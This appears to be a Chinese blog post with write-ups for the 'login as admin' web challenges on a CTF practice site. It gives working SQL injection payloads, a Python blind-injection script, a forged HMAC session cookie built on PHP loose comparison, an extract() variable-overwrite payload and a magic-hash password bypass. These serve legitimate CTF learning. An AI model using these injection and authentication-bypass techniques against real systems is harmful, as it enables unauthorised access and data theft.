2. 程式人生 > 其它 >hackme.inndy.tw的19道web題解(中)

hackme.inndy.tw的19道web題解(中)

阿新 發佈:2022-04-28

目錄

  • 寫在前面
  • ......
  • login as admin 0
  • Login as Admin 0.1
  • login as admin 1.2
  • login as admin 3
  • login as admin 4
  • login as admin 6
  • login as admin 7
  • 待續...

寫在前面

最近發現了一個比較有趣的ctf-oj,給出連結

https://hackme.inndy.tw/

裡面有不少web題,我這裡

因為依照出題人的要求:

本次文章不會直接給出flag,但是會有詳細的分析和攻擊指令碼

0x08 login as admin 0.1

admin' union select 1,2,3,4#

發現2會回顯

構造

admin' union select 1,database(),3,4#

資料庫名login_as_admin0

故此

admin' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#

發現表名h1dden_f14g

admin' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x68316464656e5f66313467 limit 0,1),3,4#

發現欄位名the_f14g

admin' union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#

拿到flag

0x09 Login as Admin 1

關注過濾

php

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
        strstr($strl, 'union select') || strstr($strl, 'select ')
    ) {
        return '';
    }
    return str_replace("'", "\'", $str);
}

多了個空格過濾,用/**/繞過即可,對於union select等過濾也十分不嚴謹,所以修改上題payload即可

admin'/**/or/**/1/**/limit/**/0,1#

即可

0x10 login as admin 1.2

這次union select不會回顯了,選擇盲注

但是太卡了……我就沒跑……大致指令碼如下,測試資料庫名正常

python

import requests
url = "https://hackme.inndy.tw/login1/index.php"
flag = ""
for i in range(1,100):
    for j in range(33,127):
        payload = "admin\'/**/or/**/(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),%s,1))=%s)/**/limit/**/0,1#"%(i,j)
        data = {
            "name":payload,
            "password":"1"
        }
        r = requests.post(url=url,data=data)
        if "You are not admin!" in r.content:
            flag += chr(j)
            print flag
            break

0x11 login as admin 3

關鍵程式碼

php

function load_user()
{
    global $secret, $error;
    if(empty($_COOKIE['user'])) {
        return null;
    }
    $unserialized = json_decode(base64_decode($_COOKIE['user']), true);
    $r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
    if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
        $error = 'Invalid session';
        return false;
    }
    $data = json_decode($unserialized['data'], true);
    return [
        'name' => $data[0],
        'admin' => $data[1]
    ];
}

發現存在弱比較:

我們只要構造出sig=0即可輕鬆繞過訊息認證碼檢測:

hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']

所以構造如下:

php

function set_user()
{
    $user = ['admin',true];
    $data = json_encode($user);
    $sig = 0;
    $all = base64_encode(json_encode(['sig' => $sig, 'data' => $data]));
    echo $all;
}
set_user();

所以cookie裡新增user=eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0=重新整理即可得到flag

0x12 login as admin 4

程式碼邏輯問題,使用者名稱為admin直接可以成功

直接curl -d "name=admin" https://hackme.inndy.tw/login4/

即可獲取flag

0x13 login as admin 6

發現關鍵程式碼

php

if(!empty($_POST['data'])) {
    try {
        $data = json_decode($_POST['data'], true);
    } catch (Exception $e) {
        $data = [];
    }
    extract($data);
    if($users[$username] && strcmp($users[$username], $password) == 0) {
        $user = $username;
    }
}

其中可以變數覆蓋:

extract($data);

所以我們構造:

data = {"users":{"admin":"sky"},"username":"admin","password":"sky"}

即可繞過,並且成功登陸

0x014 login as admin 7

0e開頭的md5弱比較

選擇:

name = admin

password = QNKCDZO

即可

相關推薦

hackme.inndy.tw的19web題解

目錄 寫在前面 ...... login as admin 0 Login as Admin 0.1 login as admin 1.2 login as admin 3 login as admin 4

hackme.inndy.tw的19web題解

目錄 寫在前面 ...... dafuq-manager 1 dafuq-manager 2. dafuq-manager 3. wordpress 1. webshell 寫在前面

hackme.inndy.tw的19web題解

目錄 寫在前面... hide and seek. guestbook. LFI .homepage. ping. scoreboard. login as admin 0 待續...

bugku平臺WEB題解

1. 提示:有輸入驗證且只允許一位輸入的限制條件 解題方法: a) 修改最大長度;

在Azure Cloud Service部署Java Web App1

Microsoft Azure是一個開放的,靈活的雲平臺,除了對自家的.Net平臺有良好的支援外,對於各種開源的軟體,語言,工具,框架都有著良好的支援,比如Java,Php,Python等等,你可以使用自己喜歡的語言開發任

在Azure Cloud Service部署Java Web App2

接上文。 9.在進行釋出之前,需要對我們的訂閱做一些設定,因為預設情況下,Azure的service end指向的是Azure global的站點,如果我們要將服務釋出在Azure的中國站點,需要做下簡單的設定,在Eclipse

LeetCode——二叉樹的前後序遍歷題解Java

目錄一、題目1、給定一個二叉樹,返回它的 前序 遍歷。2、給定一個二叉樹,返回它的 序 遍歷。3、給定一個二叉樹,返回它的 後序 遍歷。二、程式碼前序遍歷序遍歷後序遍歷三、總結

Python 工匠:寫好面向物件程式碼的原則

前言 這是 “Python 工匠”系列的第 13 篇文章。[檢視系列所有文章] 在 上一篇文章 裡,我用一個虛擬小專案作為例子,講解了“SOLID”設計原則的前兩位成員:S*單一職責原則與 O開放-關閉原則*。

web.configIIS和.htaccessApache配置

xml <?xml version=\"1.0\" encoding=\"UTF-8\"?> <configuration> <system.webServer>

史上最簡單的MySQL資料備份與還原教程三十六

資料備份與還原第二篇,具體如下 基礎概念: 備份,將當前已有的資料或記錄另存一份;

【譯】ASP.NET Core Web APIs:使用ASP.NET Core建立Web APIs 【下篇】

Multipart/form-data 請求推斷 當一個Action方法的引數被標記為[FromForm]特性時,[ApiController]特性會應用一個推斷規則,此時,請求Content-Type被推斷為multipart/form-data。

【譯】ASP.NET Core Web APIs:教程:使用ASP.NET Core 建立一個Web API

本教程將介紹使用ASP.NET Core建立一個Web API的基礎知識。 在本教程,你將學到如何:

web 基礎 HTML

web 基礎 HTML 與 XHTML 一、HTML介紹 HTMLHyper TextMarkupLanguage指的是超文字標記語言,是用來描述網頁的一種語言。它包括一系列標籤.通過這些標籤可以將網路上的檔案格式統一,使分散的Internet資源

求所有不重複路徑, Unique Paths, LeetCode題解

A robot is located at the top-left corner of amxngrid (marked \'Start\' in the diagram below). The robot can only move either down or right at any point in time. The robot is trying to reach the botto

直接擴頻通訊Verilog 實現

今天給大俠帶來直接擴頻通訊,由於篇幅較長,分三篇。今天帶來中篇,也是第二篇,系統的verilog實現。話不多說,上貨。

web 基礎 HTML5

web 基礎 HTML5 一、HTML5 HTML5 是最新的 HTML 標準。是專門為承載豐富的 web 內容而設計的,並且無需額外外掛。它擁有新的語義、圖形以及多媒體元素。並提供的新元素和新的 API 簡化了 web 應用程式的搭建,

【BZOJ1426】收集郵票 題解 期望

題目:有n種不同的郵票,皮皮想收集所有種類的郵票。唯一的收集方法是到同學凡凡那裡購買,每次只能買一張,並且買到的郵票究竟是n種郵票的哪一種是等概率的,概率均為1/n。但是由於凡凡也很喜歡郵票,所以皮皮購買

程式設計師的數學基礎課 時間和空間複雜度:優化效能是否只是“紙上談兵”?6 個通用法則

1.四則運演算法則 對於時間複雜度,程式碼的新增,意味著計算機操作的增加,也就是時間複雜度的增加。如果程式碼是平行增加的,就是加法。如果是迴圈、巢狀或者函式的巢狀,那麼就是乘法。比如二分查詢的程式碼

動態規劃題解

  動態規劃演算法似乎是一種很高深莫測的演算法,你會在一些面試或演算法書籍的高階技巧部分看到相關內容,什麼狀態轉移方程,重疊子問題,最優子結構等高大上的詞彙也可能讓你望而卻步。

洛谷7月月賽題解2020

洛谷7月月賽題解 一.前言 ​ 醜話說在前面,我只寫了前三個的題解因為有人告訴我第四題沒有價值!!